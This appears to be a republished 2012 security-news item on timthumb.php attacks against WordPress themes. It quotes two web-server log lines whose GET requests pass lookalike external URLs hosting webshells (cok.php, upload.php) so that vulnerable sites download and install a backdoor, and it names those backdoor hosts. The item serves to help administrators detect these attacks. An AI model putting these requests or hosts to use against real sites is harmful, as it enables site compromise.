List of domains hosting webshells for Timthumb attacks

We have been tracking timthumb.php related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for those type of attacks and a botnet with more than 1,000 IP addresses scanning sites that might be vulnerable to it.

If you like to look at your logs, that’s how it would look like:

216.227.214.242 – – [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1″ 404 9347 “-” “”

or

112.78.3.167 – – [31/May/2012:03:45:50 +0000] “GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1″ 404 305 “-” “”

Basically searching for hundreds of themes per site that could have the old timthumb.php enabled and attempting to insert the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php on it.

The full list of domains hosting the backdoor is on our labs post:
List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:
List of IP addresses scanning for vulnerable timthumb .

Incoming search terms

teercok

Story added 31. May 2012, content source with full text you can find at link above.

List of domains hosting webshells for Timthumb attacks

Incoming search terms

More antivirus and malware news?

Ads

Security news

Malware

Security

IT security

About site

Search Terms Tips

Recent New Tips

Recent Posts